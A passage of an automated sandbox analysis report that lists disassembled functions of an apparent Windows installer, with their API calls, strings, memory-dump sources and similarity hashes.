                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,004536B8), ref: 0045365C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressByteCharMultiProcWide
                                                                            • String ID: P@Rn$SfcIsFileProtected$sfc.dll
                                                                            • API String ID: 2508298434-2752268360
                                                                            • Opcode ID: f0ce954cf5e6c0f92a7d370075d7fcb6cf00d1472f275adf203a8e9d9dbee81d
                                                                            • Instruction ID: be851dfb18f8685af01f62dd8973d7430abba5c381566a94229306a2653f0790
                                                                            • Opcode Fuzzy Hash: f0ce954cf5e6c0f92a7d370075d7fcb6cf00d1472f275adf203a8e9d9dbee81d
                                                                            • Instruction Fuzzy Hash: 33419770A00318ABEB20DF55DC85B9D77B8AB54346F5040BBA808A7393D7789F49CE5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DC7C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 0042DC88
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE0B,00000000,0042DE23,?,?,?,?,00000006,?,00000000,00491717), ref: 0042DCA3
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DCA9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDeleteHandleModuleProc
                                                                            • String ID: RegDeleteKeyExA$advapi32.dll
                                                                            • API String ID: 588496660-1846899949
                                                                            • Opcode ID: 4c361a7a43e5834a8a8afc63cfbcc85a9ce817fb11b6eda3160fbad0bd781d86
                                                                            • Instruction ID: 9ef85b4990a5f4fb77651896212c2f73edba4f4f6701b5dd75972328515d435d
                                                                            • Opcode Fuzzy Hash: 4c361a7a43e5834a8a8afc63cfbcc85a9ce817fb11b6eda3160fbad0bd781d86
                                                                            • Instruction Fuzzy Hash: 07E06DF0B45230AAD62067ABBD4AFA327289BA5725F544037B105A619182FC4C41DE5C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047D43C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetActiveWindow.USER32(?,?,00000000,0047D751,?,?,00000001,?), ref: 0047D54D
                                                                            • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 0047D5C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveChangeNotifyWindow
                                                                            • String ID: $Need to restart Windows? %s
                                                                            • API String ID: 1160245247-4200181552
                                                                            • Opcode ID: d32a6059a512e9bf963a78dfa1268871c9947cd75c38b82ea2162a998853572e
                                                                            • Instruction ID: a8c1ceac0135a07eac7a41659c63538f6f32d9d948fb070117fc44b1a1a01c6f
                                                                            • Opcode Fuzzy Hash: d32a6059a512e9bf963a78dfa1268871c9947cd75c38b82ea2162a998853572e
                                                                            • Instruction Fuzzy Hash: 0E91A074A006449FCB01EF69E885B9E77F4AF49308F1080BBE4049B362D738A945CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046B3C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042C6E0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C704
                                                                            • GetLastError.KERNEL32(00000000,0046B5BD,?,?,00000001,004950AC), ref: 0046B49A
                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046B514
                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046B539
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeNotify$ErrorFullLastNamePath
                                                                            • String ID: Creating directory: %s
                                                                            • API String ID: 2451617938-483064649
                                                                            • Opcode ID: d0889181267df992a591f3ea40977f34f7a5259987c22db0f3b4d7debd1e95ef
                                                                            • Instruction ID: 5f4869df34387351d22434cdd0714d3fe117de94cd68d5563c6cbe2666c0fa91
                                                                            • Opcode Fuzzy Hash: d0889181267df992a591f3ea40977f34f7a5259987c22db0f3b4d7debd1e95ef
                                                                            • Instruction Fuzzy Hash: DD514174E00248ABDB01DFA5C482BDEB7F5EF48308F50856AE851B7382DB785E44CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00454178 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(?,004541E3,?,00000001,00000000), ref: 004541D6
                                                                            Strings
                                                                            • PendingFileRenameOperations, xrefs: 004541A8
                                                                            • PendingFileRenameOperations2, xrefs: 004541B7
                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454184
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                            • API String ID: 47109696-2115312317
                                                                            • Opcode ID: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                            • Instruction ID: 8e02acf7dda17f65ef86d3b585dbeec974d4a4341a7776fb0aa38c58d509200f
                                                                            • Opcode Fuzzy Hash: f34624fdd3cb7fddb242984fec9a2046b392dbdee4337d793cbee412e8c9c1b2
                                                                            • Instruction Fuzzy Hash: 2EF0F635208608BFD704D6E2DC06A1B77ECD7C5759FB14467F9009F582DE78AE94921C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004211E4 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenu.USER32(00000000), ref: 004212D1
                                                                            • SetMenu.USER32(00000000,00000000), ref: 004212EE
                                                                            • SetMenu.USER32(00000000,00000000), ref: 00421323
                                                                            • SetMenu.USER32(00000000,00000000), ref: 0042133F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu
                                                                            • String ID:
                                                                            • API String ID: 3711407533-0
                                                                            • Opcode ID: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                            • Instruction ID: 48f3a64e559805c9a8555d4ddd453999d2efe8395b615d28906c4a6af38eb170
                                                                            • Opcode Fuzzy Hash: 4c00e3b9410a05ce5c81e379d34b9db56685470e430e4bbd06adfeec13cad146
                                                                            • Instruction Fuzzy Hash: 0141BE307002645BEB20AA7AA88579B37914F65308F4845BFFC44EF3A7CA7CCC4582AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00416AB2 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(?,?,?,?), ref: 00416AF4
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00416B0E
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00416B28
                                                                            • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416B50
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$CallMessageProcSendTextWindow
                                                                            • String ID:
                                                                            • API String ID: 601730667-0
                                                                            • Opcode ID: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                            • Instruction ID: c000e8b01db0500dd6874d208778bcf8efa3d9016d5589f965051e8255cd057a
                                                                            • Opcode Fuzzy Hash: 1d3cbda9518b2ce12e9cd07cc94b211126e19477f7e649d954dcb8d793c07e3f
                                                                            • Instruction Fuzzy Hash: 74115EB2604604AFC710EE6ECC84E8777ECEF49710B15886BB55ADB652C638FC418B79
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004239F4 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnumWindows.USER32(0042398C), ref: 00423A18
                                                                            • GetWindow.USER32(?,00000003), ref: 00423A2D
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423A3C
                                                                            • SetWindowPos.USER32(00000000,004240CC,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042411B,?,?,00423CE3), ref: 00423A72
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnumLongWindows
                                                                            • String ID:
                                                                            • API String ID: 4191631535-0
                                                                            • Opcode ID: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                            • Instruction ID: 5fb1b4c26b7281e556a96b269d9e57b3a313a4882f561b886cf0e087050bba11
                                                                            • Opcode Fuzzy Hash: 8ff7365b5520c72616fb03b6a0c4256d91edd785515c56340625f2feabb98e97
                                                                            • Instruction Fuzzy Hash: 45115A70700610ABDB10EF68DC85F5A77E8EB48725F11026AF9A4AB2E2C37CDC41CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00423038 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
                                                                            • EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
                                                                            • 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
                                                                            • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A14620A480A570EnumFonts
                                                                            • String ID:
                                                                            • API String ID: 2780753366-0
                                                                            • Opcode ID: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                            • Instruction ID: 4d68480f6d607538855b0f171b38ffa839f5ce6e0578d669e72114bdc8101102
                                                                            • Opcode Fuzzy Hash: 0130a543140e80f2b9f86b8e83a342749db33d5760528b3305e50fe7c2cc1c24
                                                                            • Instruction Fuzzy Hash: 0601D2616053002AE700BF6A5C82B9B37649F00709F40027BF804AF2C7D6BE9805476E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004536EC Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                            • GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                            • CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                            • String ID:
                                                                            • API String ID: 4071923889-0
                                                                            • Opcode ID: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                            • Instruction ID: 9fccd2aefca3528e48b7c7924445ec13d0cbcd302fba8438f8af89f39fd4f237
                                                                            • Opcode Fuzzy Hash: ddcdf6928b028788f19173831482d9f32cfd0fe6233734d9ccef482c6c221cba
                                                                            • Instruction Fuzzy Hash: 6001F9F0E006087EEB209BA58C02F6BBA9CDB0D7A1F504567B904D32C2D6785E008668
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GlobalHandle.KERNEL32 ref: 00406287
                                                                            • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                            • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocHandleWire
                                                                            • String ID:
                                                                            • API String ID: 2210401237-0
                                                                            • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                            • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                            • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                            • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045A588 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 166COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                            • FlushFileBuffers.KERNEL32(?), ref: 0045A7BD
                                                                            Strings
                                                                            • NumRecs range exceeded, xrefs: 0045A6BA
                                                                            • EndOffset range exceeded, xrefs: 0045A6F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$BuffersFlush
                                                                            • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                            • API String ID: 3593489403-659731555
                                                                            • Opcode ID: f5353da7195564ca37abaa3109455b6c04b0bacf0af18a609462ca18570fcbf9
                                                                            • Instruction ID: 2b961db3f5bdd9156690fc13548013475d80f4f35adf24b78551c01bb99683a1
                                                                            • Opcode Fuzzy Hash: f5353da7195564ca37abaa3109455b6c04b0bacf0af18a609462ca18570fcbf9
                                                                            • Instruction Fuzzy Hash: 6B61B634A002948FDB24DF25C880BDAB7B5EF49305F0085EAED889B352D674AEC9CF15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0049292C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049293A), ref: 0040334B
                                                                              • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049293A), ref: 00403356
                                                                              • Part of subcall function 00409AE8: 6F561CD0.COMCTL32(00492949), ref: 00409AE8
                                                                              • Part of subcall function 004108C4: GetCurrentThreadId.KERNEL32 ref: 00410912
                                                                              • Part of subcall function 00418FB0: GetVersion.KERNEL32(0049295D), ref: 00418FB0
                                                                              • Part of subcall function 0044EFD8: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                              • Part of subcall function 0044EFD8: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                              • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                              • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                              • Part of subcall function 00451B74: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                              • Part of subcall function 00451B74: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                              • Part of subcall function 00460AF4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                              • Part of subcall function 00460AF4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                              • Part of subcall function 00468898: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 004688AD
                                                                              • Part of subcall function 00473B70: GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
                                                                              • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
                                                                              • Part of subcall function 00473B70: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
                                                                              • Part of subcall function 0048FAC4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 0048FADD
                                                                            • SetErrorMode.KERNEL32(00000001,00000000,004929E1), ref: 004929B3
                                                                              • Part of subcall function 0049273C: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                              • Part of subcall function 0049273C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                              • Part of subcall function 00424444: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424463
                                                                              • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                            • ShowWindow.USER32(?,00000005,00000000,004929E1), ref: 00492A24
                                                                              • Part of subcall function 0047CB54: SetActiveWindow.USER32(?), ref: 0047CBF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule$Window$ActiveClipboardCommandCurrentErrorF561FormatLibraryLineLoadMessageModeRegisterSendShowTextThreadVersion
                                                                            • String ID: Setup
                                                                            • API String ID: 1914857289-3839654196
                                                                            • Opcode ID: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
                                                                            • Instruction ID: eded0d4357af90f477a459f2b01769dd77d742874e450745c10b4ef5d55a2914
                                                                            • Opcode Fuzzy Hash: 639ba3783921b247417bcefc2a0b3e3d8b803f8c75a70ac499f6ae3d48694326
                                                                            • Instruction Fuzzy Hash: C33115722046006FD601BBB7ED5395D3B98EBC9719B62457FF40492A93CE7C5C418A3E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004523A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523EE
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00452497,?,?,00000000,00494628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004523F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: .tmp
                                                                            • API String ID: 1375471231-2986845003
                                                                            • Opcode ID: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
                                                                            • Instruction ID: f2a91aa9b7c92abf08b1cf9804f586f67492acd5f2b8aa702b6c2495f1d600d0
                                                                            • Opcode Fuzzy Hash: 4a0e093c0516768d85d3f1ab6189cfbf3f3e2d31e0be1d7e979444a92c8dfe51
                                                                            • Instruction Fuzzy Hash: EF216574A002089BDB01EFA1C9429DFB7B9EF49305F50447BEC01B7342DA7C9E048AA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045116C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C0
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,0aE,00000000,00456118,?,?,?,00000000,004511E6,?,?,?,00000001), ref: 004511C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorLastProcess
                                                                            • String ID: 0aE
                                                                            • API String ID: 2919029540-2709181307
                                                                            • Opcode ID: e3d63d6d3609c0b896b47cbe3e6c70e55163f3a5d4d5f4b272d250c12acc0d6d
                                                                            • Instruction ID: ba1904f8ad5b396da002b91a84b6289d0307b3cc7d8e26f05fe7202b1d1cf5f2
                                                                            • Opcode Fuzzy Hash: e3d63d6d3609c0b896b47cbe3e6c70e55163f3a5d4d5f4b272d250c12acc0d6d
                                                                            • Instruction Fuzzy Hash: 5F115A72A04608AF8B40CEA9DC81E9B77ECEB4C350B1145A6FE08D3251D634AD14CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00477198 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
